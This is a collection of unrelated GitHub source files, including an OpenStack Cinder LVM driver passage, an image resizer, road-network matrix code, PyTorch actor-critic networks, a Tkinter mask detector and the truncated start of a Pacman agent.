'Volume Group: %s'), self.configuration.volume_group)\n return\n\n self.vg.update_volume_group_info()\n data = {}\n\n # Note(zhiteng): These information are driver/backend 
specific,\n # each driver may define these values in its own config options\n # or fetch from driver specific configuration file.\n data[\"volume_backend_name\"] = self.backend_name\n data[\"vendor_name\"] = 'Open Source'\n data[\"driver_version\"] = self.VERSION\n data[\"storage_protocol\"] = self.protocol\n\n if self.configuration.lvm_mirrors > 0:\n data['total_capacity_gb'] =\\\n self.vg.vg_mirror_size(self.configuration.lvm_mirrors)\n data['free_capacity_gb'] =\\\n self.vg.vg_mirror_free_space(self.configuration.lvm_mirrors)\n elif self.configuration.lvm_type == 'thin':\n data['total_capacity_gb'] = self.vg.vg_thin_pool_size\n data['free_capacity_gb'] = self.vg.vg_thin_pool_free_space\n else:\n data['total_capacity_gb'] = self.vg.vg_size\n data['free_capacity_gb'] = self.vg.vg_free_space\n data['reserved_percentage'] = self.configuration.reserved_percentage\n data['QoS_support'] = False\n data['location_info'] =\\\n ('LVMVolumeDriver:%(hostname)s:%(vg)s'\n ':%(lvm_type)s:%(lvm_mirrors)s' %\n {'hostname': self.hostname,\n 'vg': self.configuration.volume_group,\n 'lvm_type': self.configuration.lvm_type,\n 'lvm_mirrors': self.configuration.lvm_mirrors})\n\n self._stats = data\n\n def extend_volume(self, volume, new_size):\n \"\"\"Extend an existing volume's size.\"\"\"\n self.vg.extend_volume(volume['name'],\n self._sizestr(new_size))\n\n def manage_existing(self, volume, existing_ref):\n \"\"\"Manages an existing LV.\n\n Renames the LV to match the expected name for the volume.\n Error checking done by manage_existing_get_size is not repeated.\n \"\"\"\n lv_name = existing_ref['lv_name']\n lv = self.vg.get_volume(lv_name)\n\n # Attempt to rename the LV to match the OpenStack internal name.\n try:\n self.vg.rename_volume(lv_name, volume['name'])\n except processutils.ProcessExecutionError as exc:\n exception_message = (_(\"Failed to rename logical volume %(name)s, \"\n \"error message was: %(err_msg)s\")\n % {'name': lv_name,\n 'err_msg': exc.stderr})\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n\n def manage_existing_get_size(self, volume, existing_ref):\n \"\"\"Return size of an existing LV for manage_existing.\n\n existing_ref is a dictionary of the form:\n {'lv_name': }\n \"\"\"\n\n # Check that the reference is valid\n if 'lv_name' not in existing_ref:\n reason = _('Reference must contain lv_name element.')\n raise exception.ManageExistingInvalidReference(\n existing_ref=existing_ref, reason=reason)\n lv_name = existing_ref['lv_name']\n lv = self.vg.get_volume(lv_name)\n\n # Raise an exception if we didn't find a suitable LV.\n if not lv:\n kwargs = {'existing_ref': lv_name,\n 'reason': 'Specified logical volume does not exist.'}\n raise exception.ManageExistingInvalidReference(**kwargs)\n\n # LV size is returned in gigabytes. Attempt to parse size as a float\n # and round up to the next integer.\n try:\n lv_size = int(math.ceil(float(lv['size'])))\n except ValueError:\n exception_message = (_(\"Failed to manage existing volume \"\n \"%(name)s, because reported size %(size)s \"\n \"was not a floating-point number.\")\n % {'name': lv_name,\n 'size': lv['size']})\n raise exception.VolumeBackendAPIException(\n data=exception_message)\n return lv_size\n\n\nclass LVMISCSIDriver(LVMVolumeDriver, driver.ISCSIDriver):\n \"\"\"Executes commands relating to ISCSI volumes.\n\n We make use of model provider properties as follows:\n\n ``provider_location``\n if present, contains the iSCSI target information in the same\n format as an ietadm discovery\n i.e. 
':, '\n\n ``provider_auth``\n if present, contains a space-separated triple:\n ' '.\n `CHAP` is the only auth_method in use at the moment.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.db = kwargs.get('db')\n self.target_helper = self.get_target_helper(self.db)\n super(LVMISCSIDriver, self).__init__(*args, **kwargs)\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM_iSCSI'\n self.protocol = 'iSCSI'\n\n def set_execute(self, execute):\n super(LVMISCSIDriver, self).set_execute(execute)\n if self.target_helper is not None:\n self.target_helper.set_execute(execute)\n\n def _create_target(self, iscsi_name, iscsi_target,\n volume_path, chap_auth, lun=0,\n check_exit_code=False, old_name=None):\n # NOTE(jdg): tgt driver has an issue where with a lot of activity\n # (or sometimes just randomly) it will get *confused* and attempt\n # to reuse a target ID, resulting in a target already exists error\n # Typically a simple retry will address this\n\n # For now we have this while loop, might be useful in the\n # future to throw a retry decorator in common or utils\n attempts = 2\n while attempts > 0:\n attempts -= 1\n try:\n # NOTE(jdg): For TgtAdm case iscsi_name is all we need\n # should clean this all up at some point in the future\n tid = self.target_helper.create_iscsi_target(\n iscsi_name,\n iscsi_target,\n 0,\n volume_path,\n chap_auth,\n check_exit_code=check_exit_code,\n old_name=old_name)\n break\n\n except brick_exception.ISCSITargetCreateFailed:\n if attempts == 0:\n raise\n else:\n LOG.warning(_('Error creating iSCSI target, retrying '\n 'creation for target: %s') % iscsi_name)\n return tid\n\n def ensure_export(self, context, volume):\n volume_name = volume['name']\n iscsi_name = \"%s%s\" % (self.configuration.iscsi_target_prefix,\n volume_name)\n volume_path = \"/dev/%s/%s\" % (self.configuration.volume_group,\n volume_name)\n # NOTE(jdg): For TgtAdm case iscsi_name is the ONLY param we need\n # should clean this all up at some point in the future\n model_update = self.target_helper.ensure_export(context, volume,\n iscsi_name,\n volume_path)\n if model_update:\n self.db.volume_update(context, volume['id'], model_update)\n\n def create_export(self, context, volume):\n return self._create_export(context, volume)\n\n def _create_export(self, context, volume, vg=None):\n \"\"\"Creates an export for a logical volume.\"\"\"\n if vg is None:\n vg = self.configuration.volume_group\n\n volume_path = \"/dev/%s/%s\" % (vg, volume['name'])\n\n data = self.target_helper.create_export(context, volume, volume_path)\n return {\n 'provider_location': data['location'],\n 'provider_auth': data['auth'],\n }\n\n def remove_export(self, context, volume):\n self.target_helper.remove_export(context, volume)\n\n def migrate_volume(self, ctxt, volume, host, thin=False, mirror_count=0):\n \"\"\"Optimize the migration if the destination is on the same server.\n\n If the specified host is another back-end on the same server, and\n the volume is not attached, we can do the migration locally without\n going through iSCSI.\n \"\"\"\n\n false_ret = (False, None)\n if volume['status'] != 'available':\n return false_ret\n if 'location_info' not in host['capabilities']:\n return false_ret\n info = host['capabilities']['location_info']\n try:\n (dest_type, dest_hostname, dest_vg, lvm_type, lvm_mirrors) =\\\n info.split(':')\n lvm_mirrors = int(lvm_mirrors)\n except ValueError:\n return false_ret\n if (dest_type != 'LVMVolumeDriver' or dest_hostname != self.hostname):\n return 
false_ret\n\n if dest_vg != self.vg.vg_name:\n vg_list = volutils.get_all_volume_groups()\n try:\n (vg for vg in vg_list if vg['name'] == dest_vg).next()\n except StopIteration:\n message = (\"Destination Volume Group %s does not exist\" %\n dest_vg)\n LOG.error(_('%s'), message)\n return false_ret\n\n helper = utils.get_root_helper()\n dest_vg_ref = lvm.LVM(dest_vg, helper,\n lvm_type=lvm_type,\n executor=self._execute)\n self.remove_export(ctxt, volume)\n self._create_volume(volume['name'],\n self._sizestr(volume['size']),\n lvm_type,\n lvm_mirrors,\n dest_vg_ref)\n\n volutils.copy_volume(self.local_path(volume),\n self.local_path(volume, vg=dest_vg),\n volume['size'],\n self.configuration.volume_dd_blocksize,\n execute=self._execute)\n self._delete_volume(volume)\n model_update = self._create_export(ctxt, volume, vg=dest_vg)\n\n return (True, model_update)\n\n def _iscsi_location(self, ip, target, iqn, lun=None):\n return \"%s:%s,%s %s %s\" % (ip, self.configuration.iscsi_port,\n target, iqn, lun)\n\n def _iscsi_authentication(self, chap, name, password):\n return \"%s %s %s\" % (chap, name, password)\n\n\nclass LVMISERDriver(LVMISCSIDriver, driver.ISERDriver):\n \"\"\"Executes commands relating to ISER volumes.\n\n We make use of model provider properties as follows:\n\n ``provider_location``\n if present, contains the iSER target information in the same\n format as an ietadm discovery\n i.e. ':, '\n\n ``provider_auth``\n if present, contains a space-separated triple:\n ' '.\n `CHAP` is the only auth_method in use at the moment.\n \"\"\"\n\n def __init__(self, *args, **kwargs):\n self.target_helper = self.get_target_helper(kwargs.get('db'))\n LVMVolumeDriver.__init__(self, *args, **kwargs)\n self.backend_name =\\\n self.configuration.safe_get('volume_backend_name') or 'LVM_iSER'\n self.protocol = 'iSER'\n","repo_name":"codybum/OpenStackInAction","sub_path":"scripts/icehouse/opt/stack/cinder/cinder/volume/drivers/lvm.py","file_name":"lvm.py","file_ext":"py","file_size_in_byte":24906,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"43"} +{"seq_id":"26185421359","text":"import os\nfrom PIL import Image\nfrom sys import argv, exit\n\ndef resizing_images():\n def getopts(argv):\n opts = {}\n while argv:\n if argv[0][0] == '-':\n opts[argv[0]] = argv[1]\n argv = argv[2:]\n else:\n argv = argv[1:]\n if '-w' not in opts:\n print('You must enter working directory!')\n exit([0])\n\n return opts\n\n def resizer(opts):\n workpath = opts['-w']\n default_opts = {'-d': '../{}{}/'.format(workpath.split('\\\\')[-1], '-resized'),\n '-px': 150,\n '-pf': ''}\n\n if '-d' in opts: default_opts['-d'] = opts['-d']\n if '-px' in opts: default_opts['-px'] = int(opts['-px'])\n if '-pf' in opts: default_opts['-pf'] = opts['-pf']\n workpath = opts['-w']\n destination = default_opts['-d']\n picture_size = default_opts['-px']\n postfix = default_opts['-pf']\n try:\n os.chdir(workpath)\n print('Working directory {}'.format(os.getcwd()))\n except OSError:\n print('No such file or directory')\n exit([0])\n try:\n os.makedirs(destination)\n print('Directory {} created'.format(destination))\n except OSError:\n pass\n\n for file in os.listdir():\n try:\n out = Image.open(file)\n sides = out.size\n if sides[0] > sides[1]:\n original_size = out.crop(\n ((sides[0] - sides[1]) // 2, 0, sides[0] - (sides[0] - sides[1]) // 2, sides[1]))\n else:\n original_size = out.crop(\n (0, (sides[1] - sides[0]) // 2, sides[0], sides[1] - (sides[1] - sides[0]) // 2))\n 
original_size.thumbnail((picture_size, picture_size))\n original_size.save('{}/{}{}.jpg'.format(destination, file.split('.')[0], postfix), \"JPEG\")\n print('Image {} converted'.format(file))\n except IOError:\n pass\n\n opts = getopts(argv)\n resizer(opts)\n\nresizing_images()\n","repo_name":"shimielder/resize-utility","sub_path":"resize.py","file_name":"resize.py","file_ext":"py","file_size_in_byte":2162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"41086089974","text":"import json\nimport numpy as np\nimport pandas as pd\nimport xml.etree.ElementTree as ET\nimport os\nfrom scipy.sparse import csr_matrix\nfrom copy import copy\n\n\nclass NpEncoder(json.JSONEncoder):\n def default(self, obj):\n if isinstance(obj, np.integer):\n return int(obj)\n if isinstance(obj, np.floating):\n return float(obj)\n if isinstance(obj, np.ndarray):\n return obj.tolist()\n return super(NpEncoder, self).default(obj)\n\ndef GetCityAdjacencyMatrix(cityname):\n\n print(f'Processing {cityname} road network')\n\n # load the xml file with the city map\n tree = ET.parse(f'results/net/{cityname}_road_network.net.xml')\n root = tree.getroot()\n df_road = pd.DataFrame(list(map(lambda x: [x.get('id'), x.get('from'), x.get('to')], \\\n root.findall('.//edge'))), columns = ['id', 'source', 'target']).dropna()\n\n all_nodes = np.unique(df_road[['source', 'target']])\n n = len(all_nodes)\n\n # create and save a mapper between the nodes names and integers between 1 and n\n NodeMapper = dict(zip(all_nodes, np.arange(n)))\n with open(f'results/net/NodeMapper_{cityname}.json', 'w') as json_file:\n json.dump(NodeMapper, json_file, cls=NpEncoder)\n\n # generate and save the edge\n df_road['pid1'] = df_road.source.map(lambda x: NodeMapper[x])\n df_road['pid2'] = df_road.target.map(lambda x: NodeMapper[x])\n df_road[['pid1', 'pid2']].rename(columns = {'pid1': 'source', 'pid2': 'target'}).to_csv(f'results/net/EL_{cityname}.csv', index = False)\n\n # create a mapping from edges to nodes and save it\n Edge2source = dict(df_road[['id', 'pid1']].values)\n Edge2target = dict(df_road[['id', 'pid2']].values)\n\n with open(f'results/net/Edge2source_{cityname}.json', 'w') as json_file:\n json.dump(Edge2source, json_file, cls=NpEncoder)\n \n with open(f'results/net/Edge2target_{cityname}.json', 'w') as json_file:\n json.dump(Edge2target, json_file, cls=NpEncoder)\n\n return\n\n# def GetMobilityAdjacencyMatrix(directory, Edge2source, Edge2target):\n \n# # load the mobility demand\n# print(f'Processing {directory} mobility demand')\n# file_name = f\"{directory}/dict_mobility_demand.json\"\n\n# with open(file_name) as f:\n# mob = json.load(f)\n\n# edge_list = [x['edges'] for x in mob.values()]\n# edge_list = pd.DataFrame(edge_list, columns = ['e1', 'e2'])\n\n# # define the mobility demand on nodes and save\n# mob1 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2source[x]).values, edge_list.e2.map(lambda x: Edge2source[x]).values]).T, columns = ['source', 'target'])\n# mob2 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2source[x]).values, edge_list.e2.map(lambda x: Edge2target[x]).values]).T, columns = ['source', 'target'])\n# mob3 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2target[x]).values, edge_list.e2.map(lambda x: Edge2source[x]).values]).T, columns = ['source', 'target'])\n# mob4 = pd.DataFrame(np.array([edge_list.e1.map(lambda x: Edge2target[x]).values, edge_list.e2.map(lambda x: Edge2target[x]).values]).T, columns = ['source', 
'target'])\n\n# mob = pd.concat([mob1, mob2, mob3, mob4]) \n# mob.to_csv(f'{directory}/EL.csv', index = False)\n\n# return\n\ndef dict_with_nan_mapper(x):\n try:\n y = NodeEdges2Edge[x]\n except:\n y = np.nan\n return y\n\ndef GetNBMatrix(cityname):\n\n # weight function of the distance\n f = lambda x: 1/x\n\n # create a temporary folder in which to store some variables\n os.system('mkdir tmp')\n \n # get the road in plain format\n os.system(f'netconvert -s results/net/{cityname}_road_network.net.xml -p tmp/{cityname}_plain')\n\n ################################################################################################\n # load the node dataset\n tree_node = ET.parse(f'tmp/{cityname}_plain.nod.xml')\n root_node = tree_node.getroot()\n df_nodes = pd.DataFrame([tuple([x.get('id'), x.get('x'), x.get('y')]) for x in root_node],\n columns = ['node', 'lat', 'long']).dropna()\n df_nodes.set_index('node', inplace = True)\n df_nodes.lat = df_nodes.lat.values.astype(float)\n df_nodes.long = df_nodes.long.values.astype(float)\n\n # add an integer node identifier\n df_nodes['n_id'] = np.arange(len(df_nodes))\n NodeMapper = dict(zip(df_nodes.index, df_nodes.n_id))\n n = len(df_nodes)\n\n ################################################################################################\n # load the edge dataset\n tree_edge = ET.parse(f'tmp/{cityname}_plain.edg.xml')\n root_edge = tree_edge.getroot()\n\n df_edges = pd.DataFrame([tuple([x.get('id'), x.get('from'), x.get('to')]) for x in root_edge],\n columns = ['id', 'source', 'target']).dropna()\n \n # add the edge length\n df_edges['d'] = df_edges.apply(lambda x: np.linalg.norm(df_nodes.loc[x.source] \\\n - df_nodes.loc[x.target]), axis = 1)\n \n # add an integer edge identifier\n df_edges['n_id'] = np.arange(len(df_edges))\n EdgeMapper = dict(zip(df_edges.id, df_edges.n_id))\n df_edges['n_source'] = df_edges.source.map(lambda x: NodeMapper[x])\n df_edges['n_target'] = df_edges.target.map(lambda x: NodeMapper[x])\n E = len(df_edges)\n \n #################################################################################################\n\n # build the matrices T and Q\n T = csr_matrix((1/df_edges.d, (df_edges.n_source, df_edges.n_id)), shape = (n, E))\n Q = csr_matrix((np.ones(len(df_edges)), (df_edges.n_target, df_edges.n_id)), shape = (n, E))\n\n # build the matrix M\n # NodeEdges2Edge = dict(zip(df_edges.apply(lambda x: tuple([x.source, x.target]), axis = 1), df_edges.n_id))\n rev_el = pd.DataFrame(np.array([df_edges.apply(lambda x: dict_with_nan_mapper(tuple([x.target, x.source])), axis = 1), df_edges.n_id, df_edges.d]).T,\n columns = ['rev', 'str', 'd']).dropna()\n M = csr_matrix((f(rev_el.d), (rev_el.rev, rev_el.str)), shape = (E,E))\n \n # build the non-backtracking matrix \n B = Q.T@T - M\n\n ###################################################################################################\n\n # remove the temporary folder\n os.system('rm -r tmp')\n\n # save\n b = B.nonzero()\n df_B = pd.DataFrame([b[0], b[1], np.array(B[b])[0]]).transpose().rename(columns\\\n = {0: 'source', 1: 'target', 2: 'weight'})\n\n df_B.to_csv(f'results/net/{cityname}_B.csv', index = False)\n\n with open(f'results/net/EdgeMapper_{cityname}.json', 'w') as json_file:\n json.dump(EdgeMapper, json_file, cls=NpEncoder)\n\n 
return","repo_name":"rschifan/ISICO2","sub_path":"src/get_adjacency_matrices.py","file_name":"get_adjacency_matrices.py","file_ext":"py","file_size_in_byte":6672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"10122379602","text":"\"\"\"Background processing for wxEventHandler-derived classes\"\"\"\nimport logging\nimport time\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\n\nimport wx\nimport wx.lib.newevent\n\n\n(FutureCompleteEvent, EVT_FUTURE_COMPLETE) = wx.lib.newevent.NewEvent()\n\n\nclass ThreadPool:\n def __init__(self, target, max_workers=8):\n self.target = target\n self.pool = ThreadPoolExecutor(max_workers=max_workers)\n target.Bind(EVT_FUTURE_COMPLETE, self.OnFutureComplete)\n\n def shutdown(self, *args, **kwargs):\n self.pool.shutdown(*args, **kwargs)\n\n def run(self, f, *args, callback=None, **kwargs):\n def wrapper(*args, **kwargs):\n try:\n start = time.time()\n fn_name = '.'.join(filter(None, (f.__module__, f.__qualname__)))\n fn_args = ', '.join((*map(repr, args),\n *(f'{k}={v!r}' for k,v in kwargs.items())))\n logging.info(\"Background function %s start with args (%s)\",\n fn_name, fn_args)\n ret = f(*args, **kwargs)\n logging.info(\"Background function %s took %0.3f seconds.\",\n fn_name, time.time() - start)\n return ret\n except Exception:\n logging.exception(\"Exception in background thread %s\", fn_name)\n raise\n future = self.pool.submit(wrapper, *args, **kwargs)\n if callback:\n future.add_done_callback(partial(self.post_future_event, callback))\n\n def post_future_event(self, callback, future):\n wx.PostEvent(self.target,\n FutureCompleteEvent(callback=callback,\n result=future.result()))\n\n def OnFutureComplete(self, evt):\n evt.callback(evt.result)\n","repo_name":"mrichards42/quarantine-chorus","sub_path":"standalone/app/ui/background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39555307695","text":"import torch as T\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.distributions.normal as Normal\n\nclass Actor(nn.Module):\n def __init__(self, n_inputs, n_actions, max_action, lr=1e-3, fc1_dims=256, fc2_dims=256, reparam_noise=1e-6) -> None:\n super(Actor, self).__init__()\n self.reparam_noise = reparam_noise\n self.max_action = max_action\n\n self.fc1 = nn.Linear(*n_inputs, fc1_dims)\n self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n self.mu = nn.Linear(fc2_dims, n_actions)\n self.sigma = nn.Linear(fc2_dims, n_actions)\n\n self.optim = optim.Adam(self.parameters(), lr=lr)\n self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n self.to(self.device)\n\n def foward(self, state):\n state = state.to(self.device)\n x = F.relu(self.fc1(state))\n x = F.relu(self.fc2(x))\n\n mu = self.mu(x)\n sigma = self.sigma(x)\n sigma = T.clamp(sigma, min=self.reparam_noise, max=1)\n\n return mu, sigma\n\n def sample_normal(self, state, reparameterize=True):\n mu, sigma = self.forward(state)\n action_dist = Normal(mu, sigma)\n\n if reparameterize:\n actions = action_dist.rsample()\n else:\n actions = action_dist.sample()\n\n action = T.tanh(actions) * T.tensor(self.max_actions).to(self.device)\n\n log_prob = action_dist.log_prob(actions)\n log_prob -= T.log(1-action.pow(2) + self.reparam_noise)\n log_prob = log_prob.sum(1, keepdim=True)\n\n return action, log_prob\n\n\nclass 
Value(nn.Module):\n    def __init__(self, n_inputs, lr=1e-3, fc1_dims=256, fc2_dims=256) -> None:\n        super(Value, self).__init__()\n        self.fc1 = nn.Linear(*n_inputs, fc1_dims)\n        self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n        self.v = nn.Linear(fc2_dims, 1)\n\n        self.optim = optim.Adam(self.parameters(), lr=lr)\n        self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n        self.to(self.device)\n\n    def forward(self, state):\n        state = state.to(self.device)\n        x = F.relu(self.fc1(state))\n        x = F.relu(self.fc2(x))\n        state_value = self.v(x)\n\n        return state_value\n\nclass Critic(nn.Module):\n    def __init__(self, n_inputs, n_actions, lr=1e-3, fc1_dims=256, fc2_dims=256) -> None:\n        super(Critic, self).__init__()\n        # state and action are concatenated in forward(), so the first\n        # layer takes n_inputs[0] + n_actions features\n        self.fc1 = nn.Linear(n_inputs[0] + n_actions, fc1_dims)\n        self.fc2 = nn.Linear(fc1_dims, fc2_dims)\n        self.q = nn.Linear(fc2_dims, 1)\n\n        self.optim = optim.Adam(self.parameters(), lr=lr)\n        self.device = T.device('cuda:0' if T.cuda.is_available() else 'cpu')\n        self.to(self.device)\n\n    def forward(self, state, actions):\n        state = state.to(self.device)\n        actions = actions.to(self.device)\n\n        x = F.relu(self.fc1(T.cat([state, actions], dim=1)))\n        x = F.relu(self.fc2(x))\n        q_value = self.q(x)\n\n        return q_value\n","repo_name":"FlutteryEmbers/DeepLearning","sub_path":"Reinforcement Learning/networks/sac_net.py","file_name":"sac_net.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"28912984414","text":"from tkinter import *\r\nfrom keras.models import load_model\r\nimport cv2\r\nimport numpy as np\r\n\r\nroot = Tk()\r\nroot.title(\"Mask Detector\")\r\nroot.iconbitmap(\"mask_icon.ico\")\r\nroot.geometry(\"600x600\")\r\nroot.configure(bg=\"black\")\r\n\r\nfor i in range(3):\r\n    for j in range(2):\r\n        Grid.rowconfigure(root, i, weight=1)\r\n        Grid.columnconfigure(root, j, weight=1)\r\n\r\nstop_check = False\r\n\r\n\r\ndef start_btn():\r\n    model = load_model('model-019.model')\r\n\r\n    face_clsfr = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n    source = cv2.VideoCapture(0)\r\n\r\n    labels_dict = {0: 'MASK', 1: 'NO MASK'}\r\n    color_dict = {0: (0, 255, 0), 1: (0, 0, 255)}\r\n\r\n    while True:\r\n\r\n        ret, img = source.read()\r\n        gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n        faces = face_clsfr.detectMultiScale(gray, 1.3, 5)\r\n\r\n        for x, y, w, h in faces:\r\n            # crop the detected face region (height h, width w)\r\n            face_img = gray[y:y + h, x:x + w]\r\n            resized = cv2.resize(face_img, (100, 100))\r\n            normalized = resized / 255.0\r\n            reshaped = np.reshape(normalized, (1, 100, 100, 1))\r\n            result = model.predict(reshaped)\r\n\r\n            label = np.argmax(result, axis=1)[0]\r\n\r\n            cv2.rectangle(img, (x, y), (x + w, y + h), color_dict[label], 2)\r\n            cv2.rectangle(img, (x, y - 40), (x + w, y), color_dict[label], -1)\r\n            cv2.putText(img, labels_dict[label], (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 2)\r\n\r\n        cv2.imshow(\"Mask Detector\", img)\r\n\r\n        key = cv2.waitKey(1)\r\n        if key == 32:\r\n            cv2.waitKey()\r\n\r\n        if key == 27 or stop_check:\r\n            cv2.destroyAllWindows()\r\n            source.release()\r\n            break\r\n\r\n\r\n\r\ndef stop_btn():\r\n    global stop_check\r\n    stop_check = True\r\n\r\n\r\ndisplay_label = Label(root, text=\"The screen below detects whether a person has worn a mask or not\", font=(\"Arial\", 12))\r\ndisplay_label.grid(row=0, column=0, columnspan=2, sticky=E+W)\r\n\r\nframe = LabelFrame(root, text=\"\", padx=150, pady=150, bg=\"blue\")\r\nframe.grid(row=1, column=0, columnspan=2, padx=10, pady=10)\r\n\r\nstart_img = 
+{"seq_id":"28912984414","text":"from tkinter import *\r\nfrom keras.models import load_model\r\nimport cv2\r\nimport numpy as np\r\n\r\nroot = Tk()\r\nroot.title(\"Mask Detector\")\r\nroot.iconbitmap(\"mask_icon.ico\")\r\nroot.geometry(\"600x600\")\r\nroot.configure(bg=\"black\")\r\n\r\nfor i in range(3):\r\n for j in range(2):\r\n Grid.rowconfigure(root, i, weight=1)\r\n Grid.columnconfigure(root, j, weight=1)\r\n\r\nstop_check = False\r\n\r\n\r\ndef start_detection():\r\n model = load_model('model-019.model')\r\n\r\n face_clsfr = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\r\n\r\n source = cv2.VideoCapture(0)\r\n\r\n labels_dict = {0: 'MASK', 1: 'NO MASK'}\r\n color_dict = {0: (0, 255, 0), 1: (0, 0, 255)}\r\n\r\n while True:\r\n\r\n ret, img = source.read()\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n faces = face_clsfr.detectMultiScale(gray, 1.3, 5)\r\n\r\n for x, y, w, h in faces:\r\n face_img = gray[y:y + h, x:x + w]\r\n resized = cv2.resize(face_img, (100, 100))\r\n normalized = resized / 255.0\r\n reshaped = np.reshape(normalized, (1, 100, 100, 1))\r\n result = model.predict(reshaped)\r\n\r\n label = np.argmax(result, axis=1)[0]\r\n\r\n cv2.rectangle(img, (x, y), (x + w, y + h), color_dict[label], 2)\r\n cv2.rectangle(img, (x, y - 40), (x + w, y), color_dict[label], -1)\r\n cv2.putText(img, labels_dict[label], (x, y - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.8, (255, 255, 255), 2)\r\n\r\n cv2.imshow(\"Mask Detector\", img)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 32:\r\n cv2.waitKey()\r\n\r\n if key == 27 or stop_check:\r\n cv2.destroyAllWindows()\r\n source.release()\r\n break\r\n\r\n\r\n\r\ndef stop_btn():\r\n global stop_check\r\n stop_check = True\r\n\r\n\r\ndisplay_label = Label(root, text=\"The screen below detects whether a person has worn a mask or not\", font=(\"Arial\", 12))\r\ndisplay_label.grid(row=0, column=0, columnspan=2, sticky=E+W)\r\n\r\nframe = LabelFrame(root, text=\"\", padx=150, pady=150, bg=\"blue\")\r\nframe.grid(row=1, column=0, columnspan=2, padx=10, pady=10)\r\n\r\nstart_img = PhotoImage(file=\"start.png\").subsample(4, 4)\r\nstop_img = PhotoImage(file=\"stop.png\").subsample(4, 4)\r\n\r\n\r\nstart_btn = Button(root, image=start_img, borderwidth=0, bg=\"black\", command=start_detection)\r\nstart_btn.grid(row=2, column=0, rowspan=2, sticky=E+W)\r\n\r\npause_label = Label(root, text=\"Press spacebar to pause\", bg=\"black\", fg=\"green\", font=(\"Arial\", 12))\r\npause_label.grid(row=2, column=1, sticky=E+W)\r\n\r\nstop_label = Label(root, text=\"Press Esc to stop the video\", bg=\"black\", fg=\"green\", font=(\"Arial\", 12))\r\nstop_label.grid(row=3, column=1, sticky=E+W)\r\n\r\nmade_by_label = Label(root, text=\"Made by: Rishit Daru\", anchor=E, bg=\"black\", fg=\"red\", font=(\"Arial\", 12))\r\nmade_by_label.grid(row=4, column=1, columnspan=2, sticky=E+W, pady=20)\r\n\r\n\r\nb = Label(frame, text=\"\")\r\nb.pack()\r\n\r\nroot.mainloop()\r\n\r\n\r\n","repo_name":"rishitdaru/Mask-Detector","sub_path":"mask_detector_gui_app.py","file_name":"mask_detector_gui_app.py","file_ext":"py","file_size_in_byte":2911,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
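The detection loop above interleaves capture, Haar-cascade face detection, and CNN classification inside one while loop (note the face crop now uses `h` for the row slice). The per-frame logic can be factored into a testable function; the sketch below mirrors the record's pipeline and keeps its file names ('model-019.model' and the Haar cascade XML) as assumptions about files shipped with the repository:

```python
# Per-frame pipeline factored out of the GUI loop above (paths assumed).
import cv2
import numpy as np
from keras.models import load_model

model = load_model('model-019.model')
cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
labels = {0: 'MASK', 1: 'NO MASK'}

def classify_faces(frame):
    """Return a list of (label, (x, y, w, h)) for each face in a BGR frame."""
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    results = []
    for x, y, w, h in cascade.detectMultiScale(gray, 1.3, 5):
        # Crop, normalize, and reshape exactly as the training data expects.
        face = cv2.resize(gray[y:y + h, x:x + w], (100, 100)) / 255.0
        pred = model.predict(np.reshape(face, (1, 100, 100, 1)))
        results.append((labels[np.argmax(pred, axis=1)[0]], (x, y, w, h)))
    return results
```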
+{"seq_id":"70691622841","text":"# multiAgents.py\n# --------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n#Code by Dylan Sholtes in Collaboration with Bhuvaneshwar Mohan\nfrom util import manhattanDistance\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n\n\n def getAction(self, gameState):\n \"\"\"\n You do not need to change this method, but you're welcome to.\n\n getAction chooses among the best options according to the evaluation function.\n\n Just like in the previous project, getAction takes a GameState and returns\n some Directions.X for some X in the set {North, South, West, East, Stop}\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = 